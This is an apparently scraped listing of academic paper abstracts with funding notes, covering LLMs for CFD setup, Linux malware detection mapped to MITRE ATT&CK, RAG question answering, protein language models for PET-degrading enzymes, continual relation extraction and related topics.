Configuring computational fluid dynamics(CFD)simulations typically demands extensive domain expertise,limiting broader access.Although large language models(LLMs)have advanced scientific computing,their use in automat...Configuring computational fluid dynamics(CFD)simulations typically demands extensive domain expertise,limiting broader access.Although large language models(LLMs)have advanced scientific computing,their use in automating CFD workflows is underdeveloped.We introduce a novel approach centered on domain-specific LLM adaptation.By fine-tuning Qwen2.5-7B-Instruct on NL2FOAM,our custom dataset of 28,716 natural language-to-OpenFOAM configuration pairs with chain-of-thought(CoT)annotations enables direct translation from natural language descriptions to executable CFD setups.A multi-agent system orchestrates the process,autonomously verifying inputs,generating configurations,running simulations,and correcting errors.Evaluation on a benchmark of 21 diverse flow cases demonstrates state-of-the-art performance,achieving 88.7%solution accuracy and 82.6%first-attempt success rate.This significantly outperforms larger general-purpose models such as Qwen2.5-72B-Instruct,DeepSeek-R1,and Llama3.3-70B-Instruct,while also requiring fewer correction iterations and maintaining high computational efficiency.The results highlight the critical role of domain-specific adaptation in deploying LLM assistants for complex engineering workflows.Our code and fine-tuned model have been deposited at https://github.com/YYgroup/AutoCFD.展开更多
This paper investigates the capabilities of large language models(LLMs)to leverage,learn and create knowledge in solving computational fluid dynamics(CFD)problems through three categories of baseline problems.These ca...This paper investigates the capabilities of large language models(LLMs)to leverage,learn and create knowledge in solving computational fluid dynamics(CFD)problems through three categories of baseline problems.These categories include(1)conventional CFD problems that can be solved using existing numerical methods in LLMs,such as lid-driven cavity flow and the Sod shock tube problem;(2)problems that require new numerical methods beyond those available in LLMs,such as the recently developed Chien-physics-informed neural networks for singularly perturbed convection-diffusion equations;and(3)problems that cannot be solved using existing numerical methods in LLMs,such as the ill-conditioned Hilbert linear algebraic systems.The evaluations indicate that reasoning LLMs overall outperform non-reasoning models in four test cases.Reasoning LLMs show excellent performance for CFD problems according to the tailored prompts,but their current capability in autonomous knowledge exploration and creation needs to be enhanced.展开更多
This research studies the process of 3D reconstruction and dynamic concision based on 2D medical digital images using virtual reality modelling language (VRML) and JavaScript language, with a focus on how to realize t...This research studies the process of 3D reconstruction and dynamic concision based on 2D medical digital images using virtual reality modelling language (VRML) and JavaScript language, with a focus on how to realize the dynamic concision of 3D medical model with script node and sensor node in VRML. The 3D reconstruction and concision of body internal organs can be built with such high quality that they are better than those obtained from the traditional methods. With the function of dynamic concision, the VRML browser can offer better windows for man-computer interaction in real-time environment than ever before. 3D reconstruction and dynamic concision with VRML can be used to meet the requirement for the medical observation of 3D reconstruction and have a promising prospect in the fields of medical imaging.展开更多
Under the paradigm of Industry 5.0,intelligent manufacturing transcends mere efficiency enhancement by emphasizing human-machine collaboration,where human expertise plays a central role in assembly processes.Despite a...Under the paradigm of Industry 5.0,intelligent manufacturing transcends mere efficiency enhancement by emphasizing human-machine collaboration,where human expertise plays a central role in assembly processes.Despite advancements in intelligent and digital technologies,assembly process design still heavily relies on manual knowledge reuse,and inefficiencies and inconsistent quality in process documentation are caused.To address the aforementioned issues,this paper proposes a knowledge push method of complex product assembly process design based on distillation model-based dynamically enhanced graph and Bayesian network.First,an initial knowledge graph is constructed using a BERT-BiLSTM-CRF model trained with integrated human expertise and a fine-tuned large language model.Then,a confidence-based dynamic weighted fusion strategy is employed to achieve dynamic incremental construction of the knowledge graph with low resource consumption.Subsequently,a Bayesian network model is constructed based on the relationships between assembly components,assembly features,and operations.Bayesian network reasoning is used to push assembly process knowledge under different design requirements.Finally,the feasibility of the Bayesian network construction method and the effectiveness of Bayesian network reasoning are verified through a specific example,significantly improving the utilization of assembly process knowledge and the efficiency of assembly process design.展开更多
Video action recognition(VAR)aims to analyze dynamic behaviors in videos and achieve semantic understanding.VAR faces challenges such as temporal dynamics,action-scene coupling,and the complexity of human interactions...Video action recognition(VAR)aims to analyze dynamic behaviors in videos and achieve semantic understanding.VAR faces challenges such as temporal dynamics,action-scene coupling,and the complexity of human interactions.Existing methods can be categorized into motion-level,event-level,and story-level ones based on spatiotemporal granularity.However,single-modal approaches struggle to capture complex behavioral semantics and human factors.Therefore,in recent years,vision-language models(VLMs)have been introduced into this field,providing new research perspectives for VAR.In this paper,we systematically review spatiotemporal hierarchical methods in VAR and explore how the introduction of large models has advanced the field.Additionally,we propose the concept of“Factor”to identify and integrate key information from both visual and textual modalities,enhancing multimodal alignment.We also summarize various multimodal alignment methods and provide in-depth analysis and insights into future research directions.展开更多
In the context of power generation companies, vast amounts of specialized data and expert knowledge have been accumulated. However, challenges such as data silos and fragmented knowledge hinder the effective utilizati...In the context of power generation companies, vast amounts of specialized data and expert knowledge have been accumulated. However, challenges such as data silos and fragmented knowledge hinder the effective utilization of this information. This study proposes a novel framework for intelligent Question-and-Answer (Q&A) systems based on Retrieval-Augmented Generation (RAG) to address these issues. The system efficiently acquires domain-specific knowledge by leveraging external databases, including Relational Databases (RDBs) and graph databases, without additional fine-tuning for Large Language Models (LLMs). Crucially, the framework integrates a Dynamic Knowledge Base Updating Mechanism (DKBUM) and a Weighted Context-Aware Similarity (WCAS) method to enhance retrieval accuracy and mitigate inherent limitations of LLMs, such as hallucinations and lack of specialization. Additionally, the proposed DKBUM dynamically adjusts knowledge weights within the database, ensuring that the most recent and relevant information is utilized, while WCAS refines the alignment between queries and knowledge items by enhanced context understanding. Experimental validation demonstrates that the system can generate timely, accurate, and context-sensitive responses, making it a robust solution for managing complex business logic in specialized industries.展开更多
In recent years,cyber threats have escalated across diverse sectors,with cybercrime syndicates increasingly exploiting system vulnerabilities.Traditional passive defense mechanisms have proven insufficient,particularl...In recent years,cyber threats have escalated across diverse sectors,with cybercrime syndicates increasingly exploiting system vulnerabilities.Traditional passive defense mechanisms have proven insufficient,particularly as Linux platforms—historically overlooked in favor of Windows—have emerged as frequent targets.According to Trend Micro,there has been a substantial increase in Linux-targeted malware,with ransomware attacks on Linux surpassing those on macOS.This alarming trend underscores the need for detection strategies specifically designed for Linux environments.To address this challenge,this study proposes a comprehensive malware detection framework tailored for Linux systems,integrating dynamic behavioral analysis with the semantic reasoning capabilities of large language models(LLMs).Malware samples are executed within sandbox environments to extract behavioral features such as system calls and command-line executions.These features are then systematically mapped to the MITRE ATT&CK framework,incorporating its defined data sources,data components,and Tactics,Techniques,and Procedures(TTPs).Two mapping constructs—Conceptual Definition Mapping and TTP Technical Keyword Mapping—are developed from official MITRE documentation.These resources are utilized to fine-tune an LLM,enabling it to semantically interpret complex behavioral patterns and infer associated attack techniques,including those employed by previously unknown malware variants.The resulting detection pipeline effectively bridges raw behavioral data with structured threat intelligence.Experimental evaluations confirm the efficacy of the proposed system,with the fine-tuned Gemma 2B model demonstrating significantly enhanced accuracy in associating behavioral features with ATT&CK-defined techniques.This study contributes a fully integrated Linux-specific detection framework,a novel approach for transforming unstructured behavioral data into actionable intelligence,improved interpretability of malicious behavior,and a scalable training process for future applications of LLMs in cybersecurity.展开更多
This study presents results from sentiment analysis of Dynamic message sign (DMS) message content, focusing on messages that include numbers of road fatalities. As a traffic management tool, DMS plays a role in influe...This study presents results from sentiment analysis of Dynamic message sign (DMS) message content, focusing on messages that include numbers of road fatalities. As a traffic management tool, DMS plays a role in influencing driver behavior and assisting transportation agencies in achieving safe and efficient traffic movement. However, the psychological and behavioral effects of displaying fatality numbers on DMS remain poorly understood;hence, it is important to know the potential impacts of displaying such messages. The Iowa Department of Transportation displays the number of fatalities on a first screen, followed by a supplemental message hoping to promote safe driving;an example is “19 TRAFFIC DEATHS THIS YEAR IF YOU HAVE A SUPER BOWL DON’T DRIVE HIGH.” We employ natural language processing to decode the sentiment and undertone of the supplementary message and investigate how they influence driving speeds. According to the results of a mixed effect model, drivers reduced speeds marginally upon encountering DMS fatality text with a positive sentiment with a neutral undertone. This category had the largest associated amount of speed reduction, while messages with negative sentiment with a negative undertone had the second largest amount of speed reduction, greater than other combinations, including positive sentiment with a positive undertone.展开更多
随着大型语言模型(LLMs)在超大规模语料库上开展预训练,数据污染问题逐渐凸显,这对模型性能评估的准确性构成了直接威胁。提出了一种创新的动态数据评估方法EdEval(equal distribution dynamic evaluation),旨在降低数据污染对评估准确...随着大型语言模型(LLMs)在超大规模语料库上开展预训练,数据污染问题逐渐凸显,这对模型性能评估的准确性构成了直接威胁。提出了一种创新的动态数据评估方法EdEval(equal distribution dynamic evaluation),旨在降低数据污染对评估准确性的影响。EdEval通过提取核心知识点与主旨,确保生成的评估问题在本质上与静态数据一致,并结合联网检索对知识点进行深入阐述,生成具有高质量知识支撑的评估样本。此外,EdEval通过控制问题数量和复杂度,实现动态对齐与灵活调节,以匹配静态数据的难度水平并满足不同复杂度的需求。采用布鲁姆分类法,EdEval从记忆、理解、应用、分析、评价和创造六个维度对LLMs进行综合评估。实验结果表明,EdEval在多个数据集上有效减轻了数据污染的影响,显著提高了评估的公正性和准确性。展开更多
Various tools specifically designed to accelerate evolutionary processes for biocatalysis and biotransformation have been developed in the field of protein engineering.Among them,protein language modeling(PLM)is extre...Various tools specifically designed to accelerate evolutionary processes for biocatalysis and biotransformation have been developed in the field of protein engineering.Among them,protein language modeling(PLM)is extremely efficient for large-scale screening,thus initiating a new era of accelerated prediction.Therefore,this study considered the highly promising ancestral sequence reconstruction 1(AsR1)-polyethylene terephthalate hydrolase(PETase),previously obtained via ancestral sequence reconstruction,as a representative model.The PLM Evolutionary Scale Modeling-1V was used as an amino acid optimizer to efficiently identify four beneficial variants that improved terephthalic acid(TPA)yield by 1.7-fold.The triple variant ASR1-HRT(N81H/W120R/V265T)showed a 6.1-fold increase in TPA yield compared with that of the five-site variant FAST-PETase(N233K/R224Q/S121E/D186H/R280A)through the recombination of a single beneficial variant.Moreover,ASR1-HRT achieved a depolymerization rate of 96.1%for commercial polyethylene terephthalate(PET)plastics.Molecular dynamics simulations showed that the enhancement of structural stability at high temperatures and changes in catalytic reactions due to solvation contributed to efficient and stable properties.In addition,through exploring the enzyme-PET film interaction landscape at the molecular level,the two motifs of ASR1-PETase were found to play key roles in the catalytic process at the solid-liquid interface.This enhanced the initial adsorption of the enzyme on PET film,thereby enhancing the hydrolysis performance.Overall,the PLM optimization strategy has the potential to be applied to other enzymes,thereby efficiently accelerating protein engineering.展开更多
持续关系抽取(Continuous Relation Extraction,CRE)在理解和适应不断变化的数据环境中扮演着至关重要的角色.传统的CRE技术通常面临两大难题:一是关系模式的持续演变,二是遗忘之前学习的关系的风险.尽管存储和重放旧关系典型示例的做...持续关系抽取(Continuous Relation Extraction,CRE)在理解和适应不断变化的数据环境中扮演着至关重要的角色.传统的CRE技术通常面临两大难题:一是关系模式的持续演变,二是遗忘之前学习的关系的风险.尽管存储和重放旧关系典型示例的做法在减少遗忘方面已被证明是有效的,但反复重放这些固定且有限的样本可能导致过拟合.为了解决这一问题,本文提出了一种基于动态原型的持续关系抽取方法.该方法结合了密度聚类和生成式大型语言模型,以应对上述挑战,本文将其命名为密度聚类和生成式大型语言建模(Continuous Relation Extraction with Density based Clustering and Generative Large Language Model,CRE-DCGLLM).具体而言,本文采用了密度聚类技术来提取记忆样本,缓解对先前任务的遗忘问题,并基于全量样本和记忆样本设计了动态关系原型.此外,本文通过生成式大语文模型为记忆样本生成伪样本用于重放训练,以解决因多次重放导致的模型过拟合问题.同时,本文还运用焦点知识蒸馏技术,以提升对变化中关系模式的适应性能.通过在FewRel数据集和TACRED数据集上进行的一系列实验,本文验证了该方法的有效性.实验结果显示,本文的方法在持续关系抽取的准确性和效率方面都取得了显著的提升,特别是在处理相似关系、防止知识遗忘以及克服过拟合等方面表现出了卓越的性能.展开更多
基金supported by the National Natural Science Foundation of China(Grant Nos.52306126,22350710788,12432010,11988102,92270203)the Xplore Prize.
文摘Configuring computational fluid dynamics(CFD)simulations typically demands extensive domain expertise,limiting broader access.Although large language models(LLMs)have advanced scientific computing,their use in automating CFD workflows is underdeveloped.We introduce a novel approach centered on domain-specific LLM adaptation.By fine-tuning Qwen2.5-7B-Instruct on NL2FOAM,our custom dataset of 28,716 natural language-to-OpenFOAM configuration pairs with chain-of-thought(CoT)annotations enables direct translation from natural language descriptions to executable CFD setups.A multi-agent system orchestrates the process,autonomously verifying inputs,generating configurations,running simulations,and correcting errors.Evaluation on a benchmark of 21 diverse flow cases demonstrates state-of-the-art performance,achieving 88.7%solution accuracy and 82.6%first-attempt success rate.This significantly outperforms larger general-purpose models such as Qwen2.5-72B-Instruct,DeepSeek-R1,and Llama3.3-70B-Instruct,while also requiring fewer correction iterations and maintaining high computational efficiency.The results highlight the critical role of domain-specific adaptation in deploying LLM assistants for complex engineering workflows.Our code and fine-tuned model have been deposited at https://github.com/YYgroup/AutoCFD.
基金supported by the National Natural Science Foundation of China Basic Science Center Program for“Multiscale Problems in Nonlinear Mechanics”(Grant No.11988102)the National Natural Science Foundation of China(Grant No.12202451).
文摘This paper investigates the capabilities of large language models(LLMs)to leverage,learn and create knowledge in solving computational fluid dynamics(CFD)problems through three categories of baseline problems.These categories include(1)conventional CFD problems that can be solved using existing numerical methods in LLMs,such as lid-driven cavity flow and the Sod shock tube problem;(2)problems that require new numerical methods beyond those available in LLMs,such as the recently developed Chien-physics-informed neural networks for singularly perturbed convection-diffusion equations;and(3)problems that cannot be solved using existing numerical methods in LLMs,such as the ill-conditioned Hilbert linear algebraic systems.The evaluations indicate that reasoning LLMs overall outperform non-reasoning models in four test cases.Reasoning LLMs show excellent performance for CFD problems according to the tailored prompts,but their current capability in autonomous knowledge exploration and creation needs to be enhanced.
基金Postdoctoral Fund of China (No. 2003034518), Fund of Health Bureau of Zhejiang Province (No. 2004B042), China
文摘This research studies the process of 3D reconstruction and dynamic concision based on 2D medical digital images using virtual reality modelling language (VRML) and JavaScript language, with a focus on how to realize the dynamic concision of 3D medical model with script node and sensor node in VRML. The 3D reconstruction and concision of body internal organs can be built with such high quality that they are better than those obtained from the traditional methods. With the function of dynamic concision, the VRML browser can offer better windows for man-computer interaction in real-time environment than ever before. 3D reconstruction and dynamic concision with VRML can be used to meet the requirement for the medical observation of 3D reconstruction and have a promising prospect in the fields of medical imaging.
基金Supported by National Key Research and Development Program(Grant No.2024YFB3312700)National Natural Science Foundation of China(Grant No.52405541)the Changzhou Municipal Sci&Tech Program(Grant No.CJ20241131)。
文摘Under the paradigm of Industry 5.0,intelligent manufacturing transcends mere efficiency enhancement by emphasizing human-machine collaboration,where human expertise plays a central role in assembly processes.Despite advancements in intelligent and digital technologies,assembly process design still heavily relies on manual knowledge reuse,and inefficiencies and inconsistent quality in process documentation are caused.To address the aforementioned issues,this paper proposes a knowledge push method of complex product assembly process design based on distillation model-based dynamically enhanced graph and Bayesian network.First,an initial knowledge graph is constructed using a BERT-BiLSTM-CRF model trained with integrated human expertise and a fine-tuned large language model.Then,a confidence-based dynamic weighted fusion strategy is employed to achieve dynamic incremental construction of the knowledge graph with low resource consumption.Subsequently,a Bayesian network model is constructed based on the relationships between assembly components,assembly features,and operations.Bayesian network reasoning is used to push assembly process knowledge under different design requirements.Finally,the feasibility of the Bayesian network construction method and the effectiveness of Bayesian network reasoning are verified through a specific example,significantly improving the utilization of assembly process knowledge and the efficiency of assembly process design.
基金supported by the Zhejiang Provincial Natural Science Foundation of China(No.LQ23F030001)the National Natural Science Foundation of China(No.62406280)+5 种基金the Autism Research Special Fund of Zhejiang Foundation for Disabled Persons(No.2023008)the Liaoning Province Higher Education Innovative Talents Program Support Project(No.LR2019058)the Liaoning Province Joint Open Fund for Key Scientific and Technological Innovation Bases(No.2021-KF-12-05)the Central Guidance on Local Science and Technology Development Fund of Liaoning Province(No.2023JH6/100100066)the Key Laboratory for Biomedical Engineering of Ministry of Education,Zhejiang University,Chinain part by the Open Research Fund of the State Key Laboratory of Cognitive Neuroscience and Learning.
文摘Video action recognition(VAR)aims to analyze dynamic behaviors in videos and achieve semantic understanding.VAR faces challenges such as temporal dynamics,action-scene coupling,and the complexity of human interactions.Existing methods can be categorized into motion-level,event-level,and story-level ones based on spatiotemporal granularity.However,single-modal approaches struggle to capture complex behavioral semantics and human factors.Therefore,in recent years,vision-language models(VLMs)have been introduced into this field,providing new research perspectives for VAR.In this paper,we systematically review spatiotemporal hierarchical methods in VAR and explore how the introduction of large models has advanced the field.Additionally,we propose the concept of“Factor”to identify and integrate key information from both visual and textual modalities,enhancing multimodal alignment.We also summarize various multimodal alignment methods and provide in-depth analysis and insights into future research directions.
文摘In the context of power generation companies, vast amounts of specialized data and expert knowledge have been accumulated. However, challenges such as data silos and fragmented knowledge hinder the effective utilization of this information. This study proposes a novel framework for intelligent Question-and-Answer (Q&A) systems based on Retrieval-Augmented Generation (RAG) to address these issues. The system efficiently acquires domain-specific knowledge by leveraging external databases, including Relational Databases (RDBs) and graph databases, without additional fine-tuning for Large Language Models (LLMs). Crucially, the framework integrates a Dynamic Knowledge Base Updating Mechanism (DKBUM) and a Weighted Context-Aware Similarity (WCAS) method to enhance retrieval accuracy and mitigate inherent limitations of LLMs, such as hallucinations and lack of specialization. Additionally, the proposed DKBUM dynamically adjusts knowledge weights within the database, ensuring that the most recent and relevant information is utilized, while WCAS refines the alignment between queries and knowledge items by enhanced context understanding. Experimental validation demonstrates that the system can generate timely, accurate, and context-sensitive responses, making it a robust solution for managing complex business logic in specialized industries.
基金supported by the National Science and Technology Council under grant number 113-2221-E-027-126-MY3.
文摘In recent years,cyber threats have escalated across diverse sectors,with cybercrime syndicates increasingly exploiting system vulnerabilities.Traditional passive defense mechanisms have proven insufficient,particularly as Linux platforms—historically overlooked in favor of Windows—have emerged as frequent targets.According to Trend Micro,there has been a substantial increase in Linux-targeted malware,with ransomware attacks on Linux surpassing those on macOS.This alarming trend underscores the need for detection strategies specifically designed for Linux environments.To address this challenge,this study proposes a comprehensive malware detection framework tailored for Linux systems,integrating dynamic behavioral analysis with the semantic reasoning capabilities of large language models(LLMs).Malware samples are executed within sandbox environments to extract behavioral features such as system calls and command-line executions.These features are then systematically mapped to the MITRE ATT&CK framework,incorporating its defined data sources,data components,and Tactics,Techniques,and Procedures(TTPs).Two mapping constructs—Conceptual Definition Mapping and TTP Technical Keyword Mapping—are developed from official MITRE documentation.These resources are utilized to fine-tune an LLM,enabling it to semantically interpret complex behavioral patterns and infer associated attack techniques,including those employed by previously unknown malware variants.The resulting detection pipeline effectively bridges raw behavioral data with structured threat intelligence.Experimental evaluations confirm the efficacy of the proposed system,with the fine-tuned Gemma 2B model demonstrating significantly enhanced accuracy in associating behavioral features with ATT&CK-defined techniques.This study contributes a fully integrated Linux-specific detection framework,a novel approach for transforming unstructured behavioral data into actionable intelligence,improved interpretability of malicious behavior,and a scalable training process for future applications of LLMs in cybersecurity.
文摘This study presents results from sentiment analysis of Dynamic message sign (DMS) message content, focusing on messages that include numbers of road fatalities. As a traffic management tool, DMS plays a role in influencing driver behavior and assisting transportation agencies in achieving safe and efficient traffic movement. However, the psychological and behavioral effects of displaying fatality numbers on DMS remain poorly understood;hence, it is important to know the potential impacts of displaying such messages. The Iowa Department of Transportation displays the number of fatalities on a first screen, followed by a supplemental message hoping to promote safe driving;an example is “19 TRAFFIC DEATHS THIS YEAR IF YOU HAVE A SUPER BOWL DON’T DRIVE HIGH.” We employ natural language processing to decode the sentiment and undertone of the supplementary message and investigate how they influence driving speeds. According to the results of a mixed effect model, drivers reduced speeds marginally upon encountering DMS fatality text with a positive sentiment with a neutral undertone. This category had the largest associated amount of speed reduction, while messages with negative sentiment with a negative undertone had the second largest amount of speed reduction, greater than other combinations, including positive sentiment with a positive undertone.
文摘随着大型语言模型(LLMs)在超大规模语料库上开展预训练,数据污染问题逐渐凸显,这对模型性能评估的准确性构成了直接威胁。提出了一种创新的动态数据评估方法EdEval(equal distribution dynamic evaluation),旨在降低数据污染对评估准确性的影响。EdEval通过提取核心知识点与主旨,确保生成的评估问题在本质上与静态数据一致,并结合联网检索对知识点进行深入阐述,生成具有高质量知识支撑的评估样本。此外,EdEval通过控制问题数量和复杂度,实现动态对齐与灵活调节,以匹配静态数据的难度水平并满足不同复杂度的需求。采用布鲁姆分类法,EdEval从记忆、理解、应用、分析、评价和创造六个维度对LLMs进行综合评估。实验结果表明,EdEval在多个数据集上有效减轻了数据污染的影响,显著提高了评估的公正性和准确性。
基金supported by the National Natural Science Foundation of China(Grant No.22478199)Jiangsu Basic Research Center for Synthetic Biology(Grant No.BK20233003).
文摘Various tools specifically designed to accelerate evolutionary processes for biocatalysis and biotransformation have been developed in the field of protein engineering.Among them,protein language modeling(PLM)is extremely efficient for large-scale screening,thus initiating a new era of accelerated prediction.Therefore,this study considered the highly promising ancestral sequence reconstruction 1(AsR1)-polyethylene terephthalate hydrolase(PETase),previously obtained via ancestral sequence reconstruction,as a representative model.The PLM Evolutionary Scale Modeling-1V was used as an amino acid optimizer to efficiently identify four beneficial variants that improved terephthalic acid(TPA)yield by 1.7-fold.The triple variant ASR1-HRT(N81H/W120R/V265T)showed a 6.1-fold increase in TPA yield compared with that of the five-site variant FAST-PETase(N233K/R224Q/S121E/D186H/R280A)through the recombination of a single beneficial variant.Moreover,ASR1-HRT achieved a depolymerization rate of 96.1%for commercial polyethylene terephthalate(PET)plastics.Molecular dynamics simulations showed that the enhancement of structural stability at high temperatures and changes in catalytic reactions due to solvation contributed to efficient and stable properties.In addition,through exploring the enzyme-PET film interaction landscape at the molecular level,the two motifs of ASR1-PETase were found to play key roles in the catalytic process at the solid-liquid interface.This enhanced the initial adsorption of the enzyme on PET film,thereby enhancing the hydrolysis performance.Overall,the PLM optimization strategy has the potential to be applied to other enzymes,thereby efficiently accelerating protein engineering.
文摘持续关系抽取(Continuous Relation Extraction,CRE)在理解和适应不断变化的数据环境中扮演着至关重要的角色.传统的CRE技术通常面临两大难题:一是关系模式的持续演变,二是遗忘之前学习的关系的风险.尽管存储和重放旧关系典型示例的做法在减少遗忘方面已被证明是有效的,但反复重放这些固定且有限的样本可能导致过拟合.为了解决这一问题,本文提出了一种基于动态原型的持续关系抽取方法.该方法结合了密度聚类和生成式大型语言模型,以应对上述挑战,本文将其命名为密度聚类和生成式大型语言建模(Continuous Relation Extraction with Density based Clustering and Generative Large Language Model,CRE-DCGLLM).具体而言,本文采用了密度聚类技术来提取记忆样本,缓解对先前任务的遗忘问题,并基于全量样本和记忆样本设计了动态关系原型.此外,本文通过生成式大语文模型为记忆样本生成伪样本用于重放训练,以解决因多次重放导致的模型过拟合问题.同时,本文还运用焦点知识蒸馏技术,以提升对变化中关系模式的适应性能.通过在FewRel数据集和TACRED数据集上进行的一系列实验,本文验证了该方法的有效性.实验结果显示,本文的方法在持续关系抽取的准确性和效率方面都取得了显著的提升,特别是在处理相似关系、防止知识遗忘以及克服过拟合等方面表现出了卓越的性能.